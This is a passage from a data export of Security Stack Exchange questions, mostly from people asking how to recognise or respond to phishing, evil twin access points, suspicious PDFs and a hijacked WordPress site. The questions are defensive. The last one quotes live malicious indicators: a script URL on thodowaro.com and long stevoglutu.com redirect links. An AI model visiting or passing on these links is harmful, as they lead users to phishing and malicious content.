  &amp;lt;br&amp;gt;&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;94&amp;lt;/span&amp;gt;A&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;62&amp;lt;/span&amp;gt;p&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;62&amp;lt;/span&amp;gt;p&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;61&amp;lt;/span&amp;gt;l&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;23&amp;lt;/span&amp;gt;e&amp;lt;span style="color:transparent;font-size:0px"&amp;gt;24&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;
 &amp;lt;/div&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;When the HTML is rendered it looks like this:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/WJ9lT.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/WJ9lT.png" alt="HTML Rendered"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;And when you extract only the information between HTML tags it looks like this:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;P42l84e35a44s66e42 C52o42n42f42i42r12m75 53y42o42u24r83s42 66a61c42c23o52u55n42t74 87i61s33 42f31i11n21a62l42 61n12o43w23.42
 o61p32e40n52 42a82t31t44a49c42h82m33e92n44t42s62 51d48o82c42x53 61h47e42r42e62 71t45o42 42v64e67r94i88f42y93 45i74t99.
 42S83i24n89c84e73r62e12l13y
 94A62p62p61l23e24
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Of course the email also contained a word doc attachment that is probably the real payload, but I'm wondering what the point of this weird encoding is, besides just looking cool?&lt;/p&gt;
 &lt;p&gt;There is a similar post on stackexchange &lt;a href="https://security.stackexchange.com/questions/152052/unusual-phishing-email"&gt;here&lt;/a&gt;, but I'm more wondering if anyone has any theories about the encoded sequence of numbers and if it has any meaning.&lt;/p&gt;
 &lt;p&gt;The number sequence itself is:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;4284354466425242424242127553424224834266614223525542748761334231112162426112432342613240524282314449428233924442625148824253614742426271454242646794884293457499428324898473621213946262612324
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>Using Wireshark to detect Evil Twin attack in a private wireless network</t>
  </si>
  <si>
    <t>&lt;p&gt;I wanted to learn what would be the best way(s) to detect an Evil Twin attack on a private network. I see a lot of literature about detecting the attack in a public setting, which seems to make the solutions more complicated. I wonder if it is easier to detect the attack if let's say, my neighbour sets up an Evil Access Point which I unfortunately join and now have all my traffic being redirected to the neighbour's AP. Can capturing and analysing Wireshark traffic help in this situation in any way? One idea was to verify the MAC address of the router but it looks like that can be spoofed by the Evil Twin as well.&lt;/p&gt;
 &lt;p&gt;P.S.- Someone mentioned in one of the answers &lt;a href="https://security.stackexchange.com/questions/85138/how-would-you-detect-an-evil-twin-attack-especially-in-a-new-environment"&gt;here&lt;/a&gt; that for the private network, we could just try to login to router configurations to check but that could also be a possible phishing attack to steal the router password as well, so I'm looking for alternate suggestions.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;wireless&gt;&lt;wireshark&gt;&lt;evil-twin&gt;</t>
  </si>
  <si>
    <t>user61231</t>
  </si>
  <si>
    <t>Suspicious SMS getting received on selected browsing</t>
  </si>
  <si>
    <t>&lt;p&gt;I am receiving several suspicious SMS messages with links telling me that I have requested subscription to their services (which I have not) asking me to confirm subscription.&lt;/p&gt;
 &lt;p&gt;These SMS appear only when I visit a few selected sites on my android phone. It is as if there is someone in the network watching my traffic and spamming me only when I visit those sites. Also, after a while surfing, whichever link on those selected websites I click I get redirected to ads.&lt;/p&gt;
 &lt;p&gt;In the latest instance, after several such spam SMS messages got received the ISP automatically subscribed me to some useless paid service, with no action or confirmation from me.&lt;/p&gt;
 &lt;p&gt;Is the network operator/someone targeting my number based on the websites I am visiting? And how can I stop this?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;sniffer&gt;&lt;phishing&gt;&lt;sms&gt;</t>
  </si>
  <si>
    <t>Chrome popup - what if button labels for "Accept/Cancel" are exchanged?</t>
  </si>
  <si>
    <t>&lt;p&gt;Almost all websites show inline modal popups in chrome. How can I be sure that "Cancel" is really cancel and "OK/accept/allow" are properly labeled by the website? &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;chrome&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Advised to block all traffic to/from specific IP addresses</t>
  </si>
  <si>
    <t>&lt;p&gt;My CFO received an email from a director at a financial institution advising that all traffic (inbound and outbound) from certain IP addresses should be blocked at the firewall. The director at the financial institution was advised by his IT department to send this mail. The list of addresses (about 40) was in an attached, password-protected PDF. The password was sent to my CFO by text message.&lt;/p&gt;
 &lt;p&gt;I initially thought this was a malicious attempt to get our CFO to open an infected PDF, or a phishing/whaling attempt, but it seems legit. We have spoken to the IT department at the FI and they say it's genuine, but they can't (won't) provide any more information. Due to the nature of the relationship between my company and the FI, refusing isn't really an option. From what I can see most of the IP addresses appear to belong to tech companies. &lt;/p&gt;
 &lt;p&gt;Does this approach strike you as suspicious? Is there some social engineering going on here? What could the nature of the threat be?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;firewalls&gt;&lt;social-engineering&gt;</t>
  </si>
  <si>
    <t>Why initiate this phishing attempt as an email?</t>
  </si>
  <si>
    <t>&lt;p&gt;While browsing some sketchy site on my Chrome for iOS browser I got redirected out of my browser into my Mail app. 
 I was greeted with this message:
 &lt;a href="https://i.stack.imgur.com/DIy4e.jpg" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/DIy4e.jpg" alt="enter image description here"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;I immediately figured this was a phishing attempt to get me to hit send and they'd have my email address or try to get other details in a reply. But then I realized the "to:" email was "foo@example.com". Now I'm not saying the phisher &lt;em&gt;can't&lt;/em&gt; own that email, but seeing as that email is used all time to where it's basically a default throwaway/test/example address it seems unlikely to me it's still available for someone to grab and use for this.&lt;/p&gt;
 &lt;p&gt;So what I'm wondering is why throw me into my mail client in this phishing attempt. Is it likely they do own that email or have a way to intercept mail to it? Or were they just using the mail client as a sort of popup with the goal of me to call the number in the subject line?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;ios&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>How can a user detect when a web server is phishing his credentials?</t>
  </si>
  <si>
    <t>&lt;p&gt;These days so many websites/apps (including StackExchange) allow logging in using your Facebook, GoogleId, or LinkedIn credentials. Whatever method you choose, you are presented a box to enter your credentials for that method. I think it is possible for a malicious web site/app to make a fake credential form which resembles say Google login, and phish your credentials.&lt;/p&gt;
 &lt;p&gt;Are there any safeguards to stop this from happening?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;credentials&gt;</t>
  </si>
  <si>
    <t>Is there a "how to" about Gmail fraud, updated at least once per week?</t>
  </si>
  <si>
    <t>&lt;p&gt;My Gmail account has just been cracked and many of my contacts are receiving fake emails, claiming that I'm in troubles and requesting money.&lt;/p&gt;
 &lt;p&gt;Searching for advice, using Google, about what actions are to be undertaken, I've found stereotyped and generic suggestions about "good habits", and developed a feeling for them.&lt;br&gt;
 But there don't seem to be "contingency specific" guidelines and forensic tutelage. (For example, if someone really sends money, could he arrange that I should reimburse him? Or, even worse, what if criminal use is made of my account ... ?) &lt;/p&gt;
 &lt;p&gt;Is there a "how to" about current phishing threats on Gmail, that is updated at least once per week?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;incident-response&gt;&lt;gmail&gt;</t>
  </si>
  <si>
    <t>Phone calls that listen to you saying hello and then say "goodbye"</t>
  </si>
  <si>
    <t>&lt;p&gt;I live in France. About 5-10 times, once every 1-2 months, I receive an automated computerized call that listens to me say "hello" there is silence for 5 seconds, and then there is a voice recording of a British woman saying "good-bye".&lt;/p&gt;
 &lt;p&gt;If it isn't a sales call or a phishing call, then what is this kind of call? Why do I receive this call with a UK automated voice from France on a French ISP landline number?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phone&gt;</t>
  </si>
  <si>
    <t>Is it a good security practice to force employees hide their employer to avoid being targeted?</t>
  </si>
  <si>
    <t>&lt;p&gt;A young tech company which operates on sensitive data has employees that fall victim to phishing/porting scams despite its best efforts to instill security fobs, vpn, password managers, non-sms 2FA, limited email access and so on. &lt;/p&gt;
 &lt;p&gt;Is it a good practice to force employees to hide their employment status from the public to avoid being targeted for hacking (e.g. remove the employer from LinkedIn)?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;corporate-policy&gt;</t>
  </si>
  <si>
    <t>Redacting URLs as an email-phishing preventative?</t>
  </si>
  <si>
    <t>&lt;p&gt;In a large organization (e.g., a city staff), relying on human behavior to prevent phishing attacks isn't nearly effective enough. While it would be somewhat inconvenient (security usually is), I'm thinking of an approach whereby the email client would redact all URLs in a message. Not only make the URLs inactive, but eliminating them entirely. For example, something like this:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Click here to see our new report on property taxes:&lt;/p&gt;
  &lt;p&gt;[URL removed]&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;If there really is a new report, and if the city staffer really wants to see it, he or she can go to the website and track down the report. If the user goes to the website through a password manager or a bookmark, there's no way the bogus site will be reached instead of the real site. (A phishing attack involving a site that the user is unfamiliar with, and therefore has no login for, wouldn't be a phishing attack.)&lt;/p&gt;
 &lt;p&gt;While not all phishing attacks involve URLs in emails, my guess is that 99% of them probably do.&lt;/p&gt;
 &lt;p&gt;I'd appreciate some comments on whether you think this would be effective in reducing phishing attacks. I'm less interested in whether the absence of URLs presents an inconvenience, as I know it does.&lt;/p&gt;
 &lt;p&gt;(Forcing the email client to operate in text mode only removes the linkage; the URL is still there.)&lt;/p&gt;</t>
  </si>
  <si>
    <t>How to detect if a user is logged in to a specific website?</t>
  </si>
  <si>
    <t>&lt;p&gt;I just learn about &lt;a href="http://en.wikipedia.org/wiki/Tabnabbing" rel="nofollow"&gt;tabnabbing.&lt;/a&gt;&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Tabnabbing is a computer exploit and phishing attack, which persuades
  users to submit their login details and passwords to popular websites
  by impersonating those sites and convincing the user that the site is
  genuine. [...] The exploit employs scripts to rewrite a page of
  average interest with an impersonation of a well-known website, when
  left unattended for some time.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;It is mentionned that you can detect to which website a user is currently logged in. &lt;/p&gt;
 &lt;p&gt;How would you proceed to detect is logged in Facebook from another site for example?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Are the trade offs for putting an auth token in an http-only cookie for an SPA worth it?</t>
  </si>
  <si>
    <t>&lt;p&gt;I've been building a web app (rails api + react SPA) for learning / fun and have been researching authentication. The most commonly recommended approach for authenticating SPAs that I have read is to put the auth token (such as a JWT) in a secure HTTP-only cookie to protect from XSS. This seems to have a couple of consequences:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;We now have to handle CSRF since we are using cookie authentication&lt;/li&gt;
 &lt;li&gt;Since it's an SPA we can't protect against CSRF until the user is 
 logged in, which means we are vulnerable to a login phishing attach 
 (&lt;a href="https://stackoverflow.com/questions/6412813/do-login-forms-need-tokens-against-csrf-attacks"&gt;https://stackoverflow.com/questions/6412813/do-login-forms-need-tokens-against-csrf-attacks&lt;/a&gt;)&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;But what is the real downside to just storing the auth token in browser storage (i.e. session storage)? XSS becomes slightly more convenient for the attacker? Even with an HTTP-only cookie the attacker can still use the auth token by making requests directly from the site, because if there's a XSS vulnerability then they don't need to be able to read the token to use it. &lt;/p&gt;
 &lt;p&gt;It seems that the popular recommendation just makes things more complicated to protect against CSRF just to make things a little more difficult for the attacker in the case of XSS. Due to the amount of resources making these recommendations I feel like I am missing something and would appreciate any feedback or clarifications!&lt;/p&gt;
 &lt;p&gt;Here is a couple of sources I've been reading that have been quite adamant against browser storage for auth tokens:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;a href="https://cheatsheetseries.owasp.org/cheatsheets/HTML5_Security_Cheat_Sheet.html" rel="nofollow noreferrer"&gt;https://cheatsheetseries.owasp.org/cheatsheets/HTML5_Security_Cheat_Sheet.html&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a href="https://jwt.io/introduction/" rel="nofollow noreferrer"&gt;https://jwt.io/introduction/&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a href="https://auth0.com/docs/security/store-tokens" rel="nofollow noreferrer"&gt;https://auth0.com/docs/security/store-tokens&lt;/a&gt;&lt;/li&gt;
 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;xss&gt;&lt;csrf&gt;&lt;jwt&gt;&lt;single-page-app&gt;</t>
  </si>
  <si>
    <t>Attackers on sc.imp.live.com</t>
  </si>
  <si>
    <t>&lt;p&gt;"Deceptive site ahead&lt;/p&gt;
 &lt;p&gt;Attackers on sc.imp.live.com may trick you into doing something dangerous like installing software or revealing your personal information (for example, passwords, phone numbers, or credit cards).
 Google Safe Browsing recently detected phishing on sc.imp.live.com. Phishing sites pretend to be other websites to trick you.&lt;/p&gt;
 &lt;p&gt;You can report a detection problem or, if you understand the risks to your security, visit this unsafe site."&lt;/p&gt;
 &lt;p&gt;I am receiving this message from the first time today, 25/02/2016, after, on google chrome, trying to acess my live mail on "&lt;a href="https://www.microsoft.com/en-ie/outlook-com/" rel="nofollow"&gt;https://www.microsoft.com/en-ie/outlook-com/&lt;/a&gt;" and on "&lt;a href="https://www.hotmail.com" rel="nofollow"&gt;https://www.hotmail.com&lt;/a&gt;". Anyone know anything about it? I need to acess my email but i am afraid. Thanks very much.&lt;/p&gt;
 &lt;p&gt;SOLVED - Actually today 26/02/2016 at 01:03 i tryed to acess the hotmail again and this message dont appeared, even i did absolutely nothing to solve this problem. Probably was some error from chrome or a phishing attack in the live mail website, anyway, was solved, how was solved i dont know. This topic can be closed.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;network&gt;&lt;email&gt;&lt;attacks&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>A PDF ran GetAdaptersAddresses. Should I be concerned?</t>
  </si>
  <si>
    <t>&lt;p&gt;I received and opened a PDF that ran:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;GetTickCount&lt;/li&gt;
 &lt;li&gt;IsDebuggerPresent&lt;/li&gt;
 &lt;li&gt;SetWindowsHookExW&lt;/li&gt;
 &lt;li&gt;Sleep&lt;/li&gt;
 &lt;li&gt;GetAdaptersAddresses&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;These are the 2 files it wrote:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll&lt;/li&gt;
 &lt;li&gt;C:\Windows\System32\Tasks\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;This information is from VirusTotal. I also ran a PDF I created and got the above functions except GetAdaptersAddresses. &lt;strong&gt;Why does a PDF need to run &lt;a href="https://docs.microsoft.com/en-us/windows/win32/api/iphlpapi/nf-iphlpapi-getadaptersaddresses" rel="nofollow noreferrer"&gt;GetAdaptersAddresses&lt;/a&gt;?&lt;/strong&gt; Note that VirusTotal did not mark the file as malicious.&lt;/p&gt;
 &lt;p&gt;I am also wondering whether SetWindowsHookExW can install a virus?&lt;/p&gt;
 &lt;p&gt;Any and all help will be appreciated,
 A concerned user&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;ip&gt;&lt;phishing&gt;&lt;pdf&gt;</t>
  </si>
  <si>
    <t>Automated malicious links delivered with e-mail (Reddit, LinkedIn, Package)</t>
  </si>
  <si>
    <t>&lt;p&gt;Recently my organisation has been flooded with phishing e-mails with different approaches: pretending to be Reddit or LinkedIn information about a new follower or package delivery status/problems, etc.&lt;/p&gt;
 &lt;p&gt;Every malicious e-mail is delivered from a different domain, they contain slightly different message body and subject, and various links.&lt;/p&gt;
 &lt;p&gt;I suspect this campaign is created with some kind of automated tool (automated domain registration, template e-mail with parameters..)&lt;/p&gt;
 &lt;p&gt;Different e-mail sender addresses, IP's and headers make it difficult to block on the e-mail server side. So I'm trying to find another solution to block this. For example, to block links these e-mails at the web filter level.&lt;/p&gt;
 &lt;p&gt;What I see similar in every e-mail is links with PHP script and two parameters: &lt;code&gt;utm_source&lt;/code&gt; and &lt;code&gt;utm_content&lt;/code&gt;&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;http://[domain1.com]/[some-script.php]?utm_source=1&amp;amp;utm_content=510ad2e
 http://[domain2.com]/wp-content/uploads/2021/[some-script.php]?utm_source=483edc7a&amp;amp;utm_content=e1ed
 http://[domain3.com]/[some-script.php]?utm_source=dc3abe0&amp;amp;utm_content=f7a642
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;It still isn't a strong indicator. I think many legitimate links can also have these two parameters, but it's a start.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Does anyone know the tools that this campaign created with, or maybe some common parameters and functions it can indicate to be blocked (both on e-mail server level or web filter level)?&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;What common e-mail body or headers indicators can I filter on?&lt;/strong&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;spam&gt;&lt;url&gt;</t>
  </si>
  <si>
    <t>user34807</t>
  </si>
  <si>
    <t>Can I have push notification authentication without a third party app?</t>
  </si>
  <si>
    <t>&lt;p&gt;I was reading up on the latest security meta for 2fa and learned that sms is not a secure way to conduct device verification due to phishing concerns. It seemed most articles/blogs stressed the importance of push notification authentication. Essentially, you get a push notification sent to your phone on every log in attempt, which allows you to confirm or deny the attempt. However, this is all contingent on already having third party apps installed, like Authy, which have api's that send and receive the notifications.&lt;/p&gt;
 &lt;p&gt;However, requiring users to already have a separate app installed would pretty much murder sign up conversion rates, specially in the beginning. Yet it seems that if I were to build out a push system endemic to my app, it would have the same functionality, while cutting out the third party, since all they really are offering is an existing api (which seems easily replicable). Is this correct? Or would I be missing some security features that only existing third party apps have?&lt;/p&gt;
 &lt;p&gt;(Let's assume that we're only worried about phishing/MITM/social engineering attacks which aim at stealing log in credentials/one time passwords and not actual stolen phones, in which case my proposal would have obvious problems, since the push system is tied to the app on that physical device)&lt;/p&gt;</t>
  </si>
  <si>
    <t>MiTM attack on a Tor V3 Onion Service?</t>
  </si>
  <si>
    <t>&lt;p&gt;As far as I understand it, the address of a v3 onion service is simply an ed25519 public key itself. Assuming the end user actually managed to acquire the legitimate 56 character .onion address (i.e. without getting phished/given a fake), would this not effectively render all MiTM attacks impossible?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;man-in-the-middle&gt;&lt;tor&gt;&lt;ecc&gt;</t>
  </si>
  <si>
    <t>What are the benefits of using WebAuthn?</t>
  </si>
  <si>
    <t>&lt;p&gt;The &lt;a href="https://developer.mozilla.org/en-US/docs/Web/API/Web_Authentication_API" rel="nofollow noreferrer"&gt;Web Authentication API&lt;/a&gt; allows websites served via HTTPS to allow users to authenticate via asymmetric encryption. The procedure for login is basically the following:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Server sends a challenge (16 random bytes);&lt;/li&gt;
 &lt;li&gt;Client signs the challenge;&lt;/li&gt;
 &lt;li&gt;Client sends the signature.&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;How is this better than password-based authentication?&lt;/p&gt;
 &lt;p&gt;MDN says:&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;This resolves significant security problems related to phishing, data breaches, and attacks against SMS texts or other second-factor authentication methods [...]&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;I don't understand how it prevents phishing or attacks against 2FA methods. Data breach consequences are not reduced if the passwords are properly hashed and TLS already ensures that a man-in-the-middle can't steal the password nor perform replay attacks, right?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;asymmetric&gt;&lt;webauthn&gt;</t>
  </si>
  <si>
    <t>If I use a good Master Password in Firefox, is security improved when I Remember Passwords instead of re-type?</t>
  </si>
  <si>
    <t>&lt;p&gt;In the old days I would emphasize that people should not select the remember passwords option because (besides the fact you tend to forget what the browser remembers) a bad guy could display the password (if he knew how) and read it there, and then use it later.&lt;/p&gt;
 &lt;p&gt;These days the passwords can be encrypted using a master password, so the primary problem is gone.&lt;/p&gt;
 &lt;p&gt;So should I use the feature?&lt;/p&gt;
 &lt;p&gt;On the good side, it helps prevent phishing because it checks the domain name automatically.&lt;/p&gt;
 &lt;p&gt;Also, am I just imagining, or does it also make the attacker's job more difficult? (simple key-loggers are insufficient unless the Firefox data files are fetched as well)&lt;/p&gt;
 &lt;p&gt;Then on the bad side, if someone walked up to your computer just after you logged in to a gaming site, then they could probably pull up your banking password as your master password would still be in memory, would it not?&lt;/p&gt;
 &lt;p&gt;Either way, more in-depth attacks are equally capable of obtaining data regardless of which route you took?&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Can you provide some guidance on how to decide whether to use the option, from a security standpoint?&lt;/li&gt;
 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;passwords&gt;&lt;firefox&gt;</t>
  </si>
  <si>
    <t>Sites that allow user-generated content</t>
  </si>
  <si>
    <t>&lt;p&gt;Is there a way to identify which popular sites will host arbitrary user-generated content?&lt;/p&gt;
 &lt;p&gt;I am doing some analysis to detect phishing sites. It would be nice to use the popularity of a website as a way to weed out sites that, most likely, aren't phishing sites. For instance, Google.com and Amazon.com are very unlikely to be hosting a phishing site. Thus, very popular sites might be considered trusted. However, popularity isn't a perfect proxy for trust, if some popular sites allow hosting arbitrary user content. For instance, Wordpress.com, Github.io, Googleusercontent.com, and Wix.com probably shouldn't be considered as trusted, because they host user-generated content and thus could be used to host a phishing attack.&lt;/p&gt;
 &lt;p&gt;Is there any way to obtain a list of such sites? I only care about this for the most popular sites (e.g., the Alexa top 1000 or so). Are there any website reputation or trust rating services that provide this information?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;webserver&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Can malware change the website visited by browser?</t>
  </si>
  <si>
    <t>&lt;p&gt;I heard in a security talk today (I didn't have the opportunity to ask questions):&lt;/p&gt;
 &lt;p&gt;The speaker mentioned that he observed (2 years ago) that a possible malware on a given computer was behaving such that, when the user visits a legitimate URL via the browser, the malware changes the URL that needs to be visited; so the URL in the address bar remains the same, but the page visited is now malicious.&lt;/p&gt;
 &lt;p&gt;Can someone tell how a malware could achieve this OR is this even possible today ? 
 Is the malware somehow intercepting the request sent by the browser ? &lt;/p&gt;</t>
  </si>
  <si>
    <t>Isn't the BBC being extremely irresponsible in describing how to authenticate an account-related email?</t>
  </si>
  <si>
    <t>&lt;p&gt;On &lt;a href="http://www.bbc.co.uk/faqs/bbc_account_email" rel="noreferrer"&gt;this webpage&lt;/a&gt;, the BBC says:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;h3&gt;I‚Äôve received a ‚ÄòChanges to your BBC account‚Äô email claiming to be from the BBC ‚Äì is this a genuine email?&lt;/h3&gt;
  &lt;p&gt;At the end of September 2016, we upgraded our ‚ÄòBBC iD‚Äô sign-in system to ‚ÄòBBC Account‚Äô, and as a result we had to sign everyone out of their ‚ÄòBBC iD‚Äô account.&lt;/p&gt;
  &lt;p&gt;If an email address was previously registered against a ‚ÄòBBC iD‚Äô account, we‚Äôve been sending emails to these email addresses (from ‚Äòbbcaccount@e.bbcmail.co.uk‚Äô) advising users that we‚Äôve signed them out of their account and asking them to sign back in.&lt;/p&gt;
  &lt;p&gt;These are genuine emails from the BBC and not phishing emails or spam (below is a screenshot of the email content).&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;&amp;hellip; and that's it.&lt;/p&gt;
 &lt;p&gt;I discovered this on a Facebook comment thread, where the above webpage was given as "proof" that an unexpected email was genuine and not a phish.&lt;/p&gt;
 &lt;p&gt;The email contains a link to "sign in" &amp;mdash; this link will require users to input their credentials, by definition (due to the reason for sending the email in the first place).&lt;/p&gt;
 &lt;p&gt;Isn't all of this incredibly irresponsible? Isn't the BBC grossly mistraining its audience? The &lt;em&gt;From&lt;/em&gt; field of an email has never been anywhere close to proof of the sender's identity, and providing a screenshot of the genuine content just makes it easier for fraudsters to reproduce it and con people.&lt;/p&gt;
 &lt;p&gt;Or am I missing something?&lt;/p&gt;</t>
  </si>
  <si>
    <t>I fell for a phishing attack. What should I do now?</t>
  </si>
  <si>
    <t>&lt;p&gt;Two weeks ago I visited a copy of the official website of www.runescape.com.&lt;/p&gt;
 &lt;p&gt;They asked me to fill in my account (in-game charc.) information; email (used for in-game name), password and Google authenticator linked to my game account.&lt;/p&gt;
 &lt;p&gt;Right after I filled all my information in I noticed that they asked something the real websites never would ask. That's when I realised I logged in to a fake version of the website.&lt;/p&gt;
 &lt;p&gt;I immediately change my email, password and my authenticator.
 I didn't get a notification that they tried to steal my account through my email or authenticator.&lt;/p&gt;
 &lt;p&gt;Now I'm a bit worried that they know my IP address and can follow everything I do and look into my passwords saved on my internet browsers.
 And that they can look into all my devices linked with my network.&lt;/p&gt;
 &lt;p&gt;What do you recommend I should do?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;passwords&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>WP Blog with phishing js file by a Google Search Result?</t>
  </si>
  <si>
    <t>&lt;p&gt;I wanted to check the WP homepage of a friend of mine, so I googled &amp;quot;rafaeltheissen be piano&amp;quot;.&lt;/p&gt;
 &lt;p&gt;The first Google result seems to point to the official page: &lt;code&gt;https://rafaeltheissen.com/&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;Here is the complete link copied from the Google search results:
 &lt;a href="https://www.google.com/url?sa=t&amp;amp;rct=j&amp;amp;q=&amp;amp;esrc=s&amp;amp;source=web&amp;amp;cd=&amp;amp;ved=2ahUKEwj5ps6p3ovyAhXauaQKHSkjAvQQFjAAegQIBBAD&amp;amp;url=https%3A%2F%2Frafaeltheissen.com%2Fen%2F&amp;amp;usg=AOvVaw24EO7Ic3rfmCms7XbPcI4J" rel="nofollow noreferrer"&gt;https://www.google.com/url?sa=t&amp;amp;rct=j&amp;amp;q=&amp;amp;esrc=s&amp;amp;source=web&amp;amp;cd=&amp;amp;ved=2ahUKEwj5ps6p3ovyAhXauaQKHSkjAvQQFjAAegQIBBAD&amp;amp;url=https%3A%2F%2Frafaeltheissen.com%2Fen%2F&amp;amp;usg=AOvVaw24EO7Ic3rfmCms7XbPcI4J&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;When I click on it, I am on the website and everything seems fine. But when I click somewhere, the following happens:
 On Safari, another porn/strange phishing site is opened in the background
 On Google Chrome, that doesn't seem to work but a blob URL is opened as another tab.&lt;/p&gt;
 &lt;p&gt;What I can observe before clicking somewhere:
 In the dev console I constantly see &amp;quot;Console was cleared&amp;quot; by &amp;quot;agregahehhea.js&amp;quot;, an incomprehensible js code.
 Network Source: &lt;a href="https://www.thodowaro.com/fbf601/agregahehhea.js" rel="nofollow noreferrer"&gt;https://www.thodowaro.com/fbf601/agregahehhea.js&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Redirects before the phishing page appears:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;code&gt;https://stevoglutu.com/b.3_Vi0jPk2ll-jnPoXpBqz_Jsmt9u0vP-Ux5yEzRAT_BCNDVEGFc-yHTImJlKR_eMEN5OqPS-TRNSOTaUm_dW4XTY1ZR-JbMcUdpeF_SgkhZiKjR-0lpm5nYoj_JqGras1tl-tvRwnxVya_QA1BFCrDS-kFRGCHaIV_pKELQMTNJ-PPRQ1RESy_TU0VRWNXM-EZ0aybScT_ReZfVgFhp-rjWkllRmN_MolppqtrW-XtduNvewm_xypzWAkBd-JDeEEF1GH_VImJ0KmLc-nNJOpPZQD_1SjTOUTVI-0XOYWZUa0_NcmdQe5fO-DhNimjNkT_Am1nMojpR-lrNsmtFuk_NwWxZyhzY-zBICzDMEG_ZGlHNICJZ-yLcM3NJOj_PQXRNSjTc-mVlWwXdYC_Za2bdcDd0-xfNgjhIi3_NkjlgmxnO-TpIq1rLsW_ZujvNwjxY-wzMATBACx_ZEDFNGlHN-DJkKyLYMj_lOjPZQGRI-4TNUWVEW3_MYWZRalbM-TdJehfMgj_Yi1j?&amp;amp;sseq=2&amp;amp;dseq=2&lt;/code&gt;&lt;/li&gt;
 &lt;li&gt;&lt;code&gt;https://stevoglutu.com/b.3_Va0bPc2dh-0fYgXhRii_PkTlEmmnc-npJqprZsD_1umvZwDxN-lzZAGBUCx_MEWFQG1HM-zJQK0LNMD_NOhPNQjRQ-yTOUWVYW3_NYTZQaxbM-WdJehfMgD_ki5jZkSlZ-ynco3pJqj_PsWthupvc-3xRyvzcAn_lCiDYEWFN-rHJInJNKJ_ZMDN0O0PM-TRQSxTOUD_YW2XJYnZp-vbbcmdVeJ_ZgDh0i0jM-TlQmxnOoD_Yq2r&lt;/code&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;I really would like to understand what's happening here. Does someone has an explanation for it?&lt;/p&gt;
